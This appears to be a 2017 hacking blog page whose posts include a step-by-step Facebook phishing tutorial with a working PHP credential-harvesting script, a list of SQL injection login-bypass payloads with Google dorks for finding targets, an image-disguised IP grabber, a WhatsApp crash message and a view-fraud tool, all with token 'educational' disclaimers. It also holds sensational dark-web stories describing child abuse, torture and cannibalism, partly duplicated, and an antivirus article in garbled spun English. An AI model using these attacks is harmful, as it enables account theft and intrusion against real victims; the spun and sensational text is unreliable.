Keep your self updated on technology, Hacking news & Hacking Tools/Softwares.

  • Welcome to HackVox

    Our vision is To enlighten the world in the field of science and technology and to lend a helping hand to the world and making them to help others in wide range of fields .

  • Technology

    Get yourself updated on latest Science,technology, cyber security news.

  • Get latest news,tips and tricks on ethical hacking

    We are here to provide you latest tips, tricks and softwares on cyber security and ethical hacking.

Monday, 18 December 2017

Infernal Twin Updated 2.6.11 – Automated Wireless Hacking Suite



Infernal Twin is an automated wireless hacking suite written in Python which automates many of the repetitive tasks involved in security testing for wifi networks.

Features:

  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report Generation
  • PDF Report
  • HTML Report
  • Note Taking
  • Data saved in Database
  • Network mapping
  • MiTM
  • Probe Request




Note: For Educational purpose only!!!
Share:

YouTube views hack tool (Get unlimited views)



YouTube view increaser tool features:

  • Get unlimited views
  • Faster views 

DOWNLOAD 

Requirements:

  • YouTube View increase tool
  • Proxie lists.  ( https://free-proxy-list.net/ ) 
Just copy list of proxies in the notepad one by one and save it.

Open the YouTube view increaser tool. Select the list of proxies file you saved it. Paste the link of your video and click on begin attack!

(Note: Views depends on number of proxies)
Share:

Net-creds for sniffing Passwords



Features of net-creds for Sniffing Passwords
It can sniff the following directly from a network interface or from a PCAP file:

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.


You can download net-creds here:
DOWNLOAD
Share:

Sunday, 17 December 2017

Crash WhatsApp with simple code!


Crash Friends WhatsApp/ WhatsApp group Remotely by Sending Message. 

Just Download this txt file and send it to your friends WhatsApp/Group!


BoOM!!

How to do it?

Last May a bug was discovered in Apple's iOS that caused Messages to crash automatically when a certain text (part shown above) was received. His video shows him as an 'attacker' filling a WhatsApp message full of emoji. So how to write so much of emoji?? Copy paste option wont give you the required number of emoji like 10k. And it takes long time to write them.

Do a simple thing! Open Python programming language, Copy and paste the code given below in the python terminal.

 'ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ' * 2999 

Click enter-> 2999 times emoji will display copy them and save it on notepad as UNICODE! 

(2999) is number of times, you can write it how many times you want. 
(warning: writing more than 3999 times your WhatsApp can get crashed!)

Note: For educational purpose only!!!
Share:

Saturday, 16 December 2017

Antivirus software is ineffective and waste of money!!


Antivirus software is now so ineffective at detecting new malware threats most enterprises are probably wasting their money buying it, an analysis by security firm Imperva has concluded.

Reports questioning the protection offered by antivirus suites has become a staple theme among researchers in recent times and the study Assessing the Effectiveness of Anti-Virus Solutions, carried out for Imperva by the University of Tel Aviv, is another addition to that sobering collection.

The group ran a gathering of 82 new malware records through an online malware-checking framework that tests documents against around 40 distinctive antivirus items, finding that the underlying recognition rate was a startling zero. 

The organization at that point ran a similar output various circumstances at interims of seven days separated to see whether identification enhanced after some time, finding that even the best-performing items took no less than three weeks to add a formerly undetected specimen to their databases. 

A few documents set apart as "unclassified malware" 

Crosswise over items, 12 documents that were ineffectively recognized when new were as yet not distinguished by half of the product when filtered at later dates. In a few identifications, documents were basically set apart as "unclassified malware," an assignment that would hurt the viability of malware evacuation.

Antivirus isn't a safeguard measure 

We get a kick out of the chance to consider antivirus a divider amongest us and the malevolent little carriages on the web. That is not the situation. Basically, the part of antivirus is to reveal to you that you've just been a casualty. It lets you know after they've swarmed your framework, or were in any event attempting to. 

Consider it like a house alert. On the off chance that somebody trips the alert amid the night, it implies there's somebody in your home. You don't simply kick out the terrible person and all of a sudden everything is hunky dory. There's cleanup to do. The house should be examined, law implementation educated, and if conceivable, measures taken to keep a future invasion. In like manner, just finding the malware isn't adequate. It could mean there's a more serious issue on your framework. 

Antivirus doesn't discover everything 

Antivirus must be depended on to inform us concerning the malware that it definitely thinks about. (Malware signifies "malignant programming" and envelops every one of the things you don't need tainting your framework, not simply infections.) 

There is a lot of malware in the wild which has not been found yet (these are called zero-day dangers). Whenever (and if) the malware is found by an antivirus organization, it will set aside opportunity to figure out and after that program into their database. At that point it needs to stream down to alternate antivirus organizations who will add it to their own particular antivirus programs. 

Essentially, when we're appropriately shielded against the risk, the awful folks are now discharging the following new thing. We're always attempting to make up for lost time with the terrible folks. That is a frightening idea. Regardless of whether you never observe your antivirus discovering anything, it doesn't really mean you're never traded off. 

Antivirus can be deceived 

There are unique sorts of malware that can conceal themselves from antivirus programs. They do this in some refined ways. 

A few, as rootkits, can shroud their tracks by concealing themselves from the PC with the goal that nothing can see them running. Others are customized to self-modify their own particular code, transforming into something somewhat not quite the same as their unique state, in this way tricking anything that outputs them. Despite everything others will encode themselves so they can't be perceived by any stretch of the imagination. 

Antivirus can't repair the Damage...

Much of the time where harm is done to your framework, your antivirus can't settle it. It just endeavors to evacuate the risk, not cure the fallout. Antivirus programs aren't sufficiently advanced to reestablish your ruined reports or supplant erased framework documents. That part is surrendered over to you. Or on the other hand your neighborhood PC search for a charge. 

Antivirus isn't Fool proof ??

Is it true that you are certain your antivirus is turned on? Some malware knows how to kill or hinder antivirus programs. Is it refreshing its malware database? The antivirus program itself (like some other PC program) can breakdown and not work like it should. 

Antivirus is restricted in scope 

Malware is just a little piece of what makes the web hazardous. Phishing is apparently a greater risk than infections. Social building can be similarly as destroying. Our conduct gets us in a bad position more than anything. Antivirus programs can't change your conduct. 

So what's the purpose of having antivirus? 

As frail as antivirus can be, it has its place. Simply don't overestimate its viability. In the great plan of PC well being, antivirus really assumes a fairly little part. What it comes down to is this: utilization it however don't believe it. Antivirus is a best-exertion, last line of guard and ought to be dealt with all things considered.
Share:

Friday, 15 December 2017

7 Panic Dark Web stories that will amaze and scares you



Scare stories about the ‘dark web’ are common – but what actually happens when you go ‘off piste’ into the parts of the internet Google doesn’t reach? Reddit users shared their stories about the ‘dark web’ – specifically Tor sites, invisible to normal browsers, and notorious for hosting drug markets and child pornography. Using the free Tor browser, you can access special .onion sites – only accessible using the browser – many of which openly host highly illegal content including pirated music and films, drugs, child pornography and sites where credit card details are bought and sold. MORE: Telescope detects radio signal from five billion years ago 1) The most disturbing site we found was a comprehensive guide for cooking women. We’re not talking about a short joke here. This page had information on what body types to use for specific cuts, how to prepare these cuts, and how to cook the girl so she lives as long as possible.


The ‘Dark Web' is notorious for websites that host downright 
outrageous content which may just push the boundaries of any human being. We did a detailed analysis on the Deep Web and we've gone a bit further to shed light on the underbelly of the dark web. Users browse all sorts of nefarious content behind the curtain of anonymity andit has sprung up a few stories that made their way to the surface web. We picked out 7 deep web stories that left us shocked and terrified and we feel it might just send a chills down your spine as well.


1. They See Us (From Reddit User fake_fakington

The ‘Dark Web' is notorious for websites that host downright outrageous content which may just push the boundaries of any human being. We did a detailed analysis on the Deep Web and we've gone a bit further to shed light on the underbelly of the dark web. Users browse all sorts of nefarious content behind the curtain of anonymity andit has sprung up a few stories that made their way to the surface web. We picked out 7 deep web stories that left us shocked and terrified and we feel it might just send a chills down your spine as well.
1. They See Us (From Reddit User fake_fakington)
Terrifying Dark Web Stories that will give you sleepless nights
© YouTube

“This was back before Google. Web pages were, for the most part, still very basic HTML with Javascript. Hardly anyone used CSS. Only discussion boards and some banking sites had anything approaching mature front-end/back-end combinations. Etc. Early 'Net. Real 'deep web' story, not just one about illicit activities online.

"I was browsing random blogs, Geocities sites, and the like, just going from link to link. Eventually I came upon an odd page - it appeared to be random thoughts from different people, but for the time, it was very well-designed. The messages seemed to be cryptic in nature, like several people trying to pass secret notes. I started through the source, and hidden in the comments of a javascript were various IP addresses. 

"I gathered all of the IPs in a text file and began enumerating. Some were routers with banner messages I could telnet to - almost all at universities ('Warning! This is a secure system at University of Bla Bla....'). The default Cisco credentials from back in the day worked on most of them, but I didn't poke around. A few of the IP's were web servers with little to nothing on them, mostly Apache on Linux or some BSD, at least one IIS server I can recall." 

"I finally came upon a web server with a huge directory of HTML files and TIFF images, with a few smaller subdirectories containing the same. nslookup returned no reverse records for the IP. A VisualRoute traced it as far as Colorado. The HTML files appeared to be records a psychologist or similar mental health professional would keep. The images were of faxes, apparently of both military and medical nature."

"As I browsed from a subdirectory back to the parent, at the top was a new HTML file named something like '1-.HELLO-THERE.html.' The time stamp was from right that minute. I opened it, and in plain text was the message 'we see you.' No quotes, all lowercase. About 15 seconds later the server dropped.”

2. How To Cook A Woman (Reported by reddit user baconboyloiter)

"In CompSci, we often got bored and dicked around. One day we ran into the deep web. The most disturbing site we found was a comprehensive guide for cooking women. We're not talking about a short joke here. This page had information on what body types to use for specific cuts, how to prepare these cuts, and how to cook the girl so she lives as long as possible. It horrifies me that people way worse than the freaks on Criminal Minds exist.”

3. Pink Meth

If you have an ex-girlfriend and you want to get revenge on her, there's a perfect website for you to fill it with nudes, you miserable creep. 

The website operates in the deep web where users can upload nude pictures of their ex-girlfriends which would eventually lead to harassment of the person in the picture. The website is now defunct due to multiple lawsuits, however, there's another website that has spring up since its demise. 

4. Daisy's Destruction
Child pornography is prevalent in the deep web as much as regular porn on the surface web. However, this next case takes a bit too far. There's a snuff film of a little girl who was sexually abused and tortured. The video was widely distributed amongst paedophiles on the deep web and the larger internet community got a hold of it on popular websites like 4Chan and Reddit. 

5. Saved by the bell…errr.. slow internet (Reported by Reddit user Semper_Fi_Cerberus)
“It was my third time on the deep web and I was just looking around at sites. I found this one guy's home page and on the sidebar, I saw a link that said 'For journalist and people new to the deep web'. I clicked on it, hoping that it was interesting and helpful information. A new page opened and a picture started to load. Thank god for my slow Internet because all that loaded was the head of an old Asian [sic] man with blood on his chin. I quickly closed the tab before the rest of the image loaded. To this day I wonder what the whole picture was but at the same time am thankful I didn't see it." 

"TL: DR My slow internet probably saved me from seeing a gruesome picture”

6. Live Torture Streams

There have many instances on the deep web where users have repeatedly found terrifying live streams. Some guy stumbled on a live stream where a girl was sitting in a chair and commanded people from chat window to tell her what kind of abuse she should do to herself. After many cuts, bruises, eye gouging, the girl eventually killed herself on the live stream. 

This is not the only case where people have brought harm to themselves on a live stream in the deep web. These live streams are popular known as “Red Rooms” where even ISIS has started using this platform to conduct beheadings and murder. Unlike these people, I'm very happy watching bubblegum shit on Netflix.



The ‘Dark Web' is notorious for websites that host downright outrageous content which may just push the boundaries of any human being. We did a detailed analysis on the Deep Web and we've gone a bit further to shed light on the underbelly of the dark web. Users browse all sorts of nefarious content behind the curtain of anonymity andit has sprung up a few stories that made their way to the surface web. We picked out 7 deep web stories that left us shocked and terrified and we feel it might just send a chills down your spine as well.
1. They See Us (From Reddit User fake_fakington)
Terrifying Dark Web Stories that will give you sleepless nights
© YouTube

“This was back before Google. Web pages were, for the most part, still very basic HTML with Javascript. Hardly anyone used CSS. Only discussion boards and some banking sites had anything approaching mature front-end/back-end combinations. Etc. Early 'Net. Real 'deep web' story, not just one about illicit activities online.

"I was browsing random blogs, Geocities sites, and the like, just going from link to link. Eventually I came upon an odd page - it appeared to be random thoughts from different people, but for the time, it was very well-designed. The messages seemed to be cryptic in nature, like several people trying to pass secret notes. I started through the source, and hidden in the comments of a javascript were various IP addresses. 

"I gathered all of the IPs in a text file and began enumerating. Some were routers with banner messages I could telnet to - almost all at universities ('Warning! This is a secure system at University of Bla Bla....'). The default Cisco credentials from back in the day worked on most of them, but I didn't poke around. A few of the IP's were web servers with little to nothing on them, mostly Apache on Linux or some BSD, at least one IIS server I can recall." 

"I finally came upon a web server with a huge directory of HTML files and TIFF images, with a few smaller subdirectories containing the same. nslookup returned no reverse records for the IP. A VisualRoute traced it as far as Colorado. The HTML files appeared to be records a psychologist or similar mental health professional would keep. The images were of faxes, apparently of both military and medical nature."

"As I browsed from a subdirectory back to the parent, at the top was a new HTML file named something like '1-.HELLO-THERE.html.' The time stamp was from right that minute. I opened it, and in plain text was the message 'we see you.' No quotes, all lowercase. About 15 seconds later the server dropped.”
2. How To Cook A Woman (Reported by reddit user baconboyloiter)
Terrifying Dark Web Stories that will give you sleepless nights
© YouTube

 Live: People Reading Now

RELATIONSHIP ADVICE
The Adulterated Thrill Of An Office Romance
"In CompSci, we often got bored and dicked around. One day we ran into the deep web. The most disturbing site we found was a comprehensive guide for cooking women. We're not talking about a short joke here. This page had information on what body types to use for specific cuts, how to prepare these cuts, and how to cook the girl so she lives as long as possible. It horrifies me that people way worse than the freaks on Criminal Minds exist.”
3. Pink Meth
Terrifying Dark Web Stories that will give you sleepless nights
© YouTube

If you have an ex-girlfriend and you want to get revenge on her, there's a perfect website for you to fill it with nudes, you miserable creep. 

The website operates in the deep web where users can upload nude pictures of their ex-girlfriends which would eventually lead to harassment of the person in the picture. The website is now defunct due to multiple lawsuits, however, there's another website that has spring up since its demise. 
4. Daisy's Destruction
Terrifying Dark Web Stories that will give you sleepless nights
© YouTube

Child pornography is prevalent in the deep web as much as regular porn on the surface web. However, this next case takes a bit too far. There's a snuff film of a little girl who was sexually abused and tortured. The video was widely distributed amongst paedophiles on the deep web and the larger internet community got a hold of it on popular websites like 4Chan and Reddit. 



7. The Human Experiment 
If you thought the Nazis were the last people to conduct human experiments during the Holocaust you couldn't be wrong. This website is an index which provides documents for performing your own experiments in concentration camps. 

The website claims that apparently, they have multiple warehouses where they perform such despicable experiments on humans. They conduct experiments such as injecting a pregnant woman with bleach, starvation, radiation exposure and even sterilisation. The website details that these humans being experimented on are homeless people abducted for the sole purpose of experimentation.

I think their slogan says it all “Not all humans are equal, for some of them were born superior to others”

Source: Pastebin, Reddit.

Share:

How hackers hack facebook account & How to stop them??


Facebook is one of the most popular social networking website with more than 1 billion active users.Hacking a Facebook account has been made possible and easy thanks to online programs that give you the opportunity to hack Facebook account online without necessarily downloading any foreign software or program. A good number of these online hacking methods are free for use.

#1 Phishing
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Log in Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to log in through these pages,  his/her Facebook login details is stolen away. you can make any phishing login page to hack facebook using phishing.

Step 1: To hack facebook using phishing, first of all, go to the Facebook and then right-click on the blank area, you will see the option view source page simply click on that.

Step 2: Now a tab will open which will contain source code of Facebook login page.

Step 3:  select all code and copy all code then paste it in notepad.

Step 4: When source code is pasted in notepad after that press Ctrl+F and type action in notepad.

Step 5: you will have to search again and again till you have found a text which looks like (Use ctrl+f) to find

action=”https://www.facebook.com/login.php?login_attempt=1&lwv=111

Step 6: After that delete all the text written in green and instead of write it Post.php. After that, it will look like action=”post.php”

Step 7: Save it on your desktop or in any hard drive storage with the name index.htm and yes remember not as index.html as many times people save it as index.html.

Step 8: Now you need to create a php file for this Open a new notepad and copy the code given below and save it with the name post.php.

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

you have successfully created two files 1. index.htm and 2. post.php

Step 9. You need to upload these two files in a free web hosting site. some best webhosting site which are useful for you. you need to make a account on any of one below web hosting site.

*www.my3gb.com
*Hostinger
*www.000webhost.com
*Freehosting
*I prefer www.000webhost.com

Step 10: now you have to sign up simply fill all required information in the registration form. When your account completely setup simply log in with your username and password.

Step 11: Open Cpanel (control panel) then click on file manager, after that a new window will pop up. Now go to public_html.

Step 12: Delete the file named default.php after that you need to upload index.htm and post.php file click on upload files button and upload both files one by one. Now click on index.htm which will look like same as that of the original Facebook page. this is your phishing page.

Step 13:Copy URL of that page and send this link to victim on Facebook , Gmail , or wherever you want, when victim open that link he see fake Facebook page which look like  real and enter their username and password and hit log in his password, the page redirects connect to facebook and you will able to see his/her password by going into account  000webhost.com and go to file manager and then public_html here you will find a new file as username.txt. Before sending this link to anyone shorten its URL first which may help you to undetected by Facebook. You have successfully hack Facebook using Phishing.

Note this is for educational purpose only!!!

To remain shielded from phishing, you should simply to stay ready and cautious. Be somewhat mindful before clicking any connection got in messages. Before marking in to any Facebook landing page, first check the URL warily. Do whatever it takes not to logging utilizing different "Facebook gadgets" offered by sites and online journals. Better, you write the URL of Facebook, i.e. www.facebook.com which will straight away take you to the genuine site with no vagueness.

#2 Hacking Email Linked to facebook

I have dependably been confounded by individuals' mercy in this issue. The vast majority leave their email tends to noticeable on their Facebook profiles. A programmer at that point should simply know your name and he will be advantageously demonstrated your email address at your profile. Likewise, the vast majority share their email ids all over. How effortlessly a programmer would then be able to hack your Facebook account (and everything else related with that email id) on the off chance that he 'surmises' your secret key (on the off chance that you utilize a powerless watchword) or answers your security question! 

Here are a few deceives you can use to shield yourself from this helplessness.
Keep your Email address hidden from everyone. To do this go to Edit Profile>Contact Information>Click the icon beside your email address> check the option ‘Only Me’
Always use a familiar ID as the primary email address. It is better not to use the email that you share with everyone as the primary email. To set a new email as the primary email, go to Account Settings>Email> Enter your primary email.
Most likely, you will use the same laptop, computer or tablet to access your Facebook on daily office. Very rarely you will be in a situation when you will be using a new device. Hence, always set your account to inform you whenever, it is accessed from a new location or a new computer. To do this go to Account Settings>check ‘Secure browsing’>’Send me an email when a new computer or mobile device logs into this account’ and click ‘Save.’

Using worst email passwords to email and dumb security questions are likely to be hacked.

#3 Keylogging through Keyloggers
Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

#4 How to stop keyloggers?
Install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person's flash and pen drives before using them on your computer.

#5 Social Engineering
What is Social Engineering??
Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your security question in a friendly chat or discussion.
In a social building assault, an aggressor utilizes human connection (social abilities) to acquire or bargain data around an association or its PC frameworks. An assailant may appear to be unassuming and respectable, conceivably asserting to be another representative, repair individual, or scientist and notwithstanding offering accreditations to help that personality. In any case, by making inquiries, he or she might have the capacity to sort sufficiently out data to invade an association's system. In the event that an aggressor can't assemble enough data from one source, he or she may contact another source inside a similar association and depend on the data from the main source to add to his or her believability.

#6 How to prevent yourself from being socially engineered?
Stay aware during chats and discussions. Use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password to 12345678 or do something as silly as asking you to send out your login details to prove that you are an active user. Always think before taking actions and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.

Share:

Bypass website Authentication

Basic sql injection

Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now use Google dork:

There is a large number of Google dork for basic sql injection. 
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"


Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 -- 

" or 0=0 -- 

or 0=0 -- 

' or 0=0 # 

" or 0=0 # 

or 0=0 # 

' or 'x'='x 

" or "x"="x 

') or ('x'='x 

' or 1=1-- 

" or 1=1-- 

or 1=1-- 

' or a=a-- 

" or "a"="a 

') or ('a'='a 

") or ("a"="a 

hi" or "a"="a 

hi" or 1=1 -- 

hi' or 1=1 -- 
'or'1=1'


there are many more but these are the best ones that i know .So your input should look like this

username:Admin
password:'or'1'='1

Click submit. You'll get access

NOTE: All sites are not vulnerable. This is for education purpose only!!

Share:

Steal IP using Image!!



In this post we will learn how to grab IP using an image. In this we use .htaccess along with a php file and add.jpg files to php executable using htaccess.
This is the ht access code which can add jpg as php executable

AddHandler application/x-httpd-php5 .jpg

Now make a grabber.jpg file with the below code.

<?php
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im = imagecreatefromjpeg("Love.png");
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

Now in the end put a image with Love.png in the same folder and change the permission for grabber.jpg to 755 you are ready with your ip grabber.
IP_List.txt the image grabbed your IP when you visited this page 

Note: This is for educational purpose only!!!
Share:

Thursday, 14 December 2017

Remove Shortcut virus

Removing Shortcut Virus from your device! 

You can Remove the Shortcut virus using CMD, This removes the virus permanently.  This removes the shortcut virus from Pendrive/ Hard disks / SD cards/ Mobile Phones


  • Go to Start -> Run -> cmd.
  • Go to your pen drive SD cards or drive directory.
  • E:
  • del *.lnk
  • Type attrib -h -r -s /s /d e:*.* (Where e is the Drive Label )
  • And then press Enter.



Share:

Popular Posts

Subscribe to my Newsletter

Contact Us

Name

Email *

Message *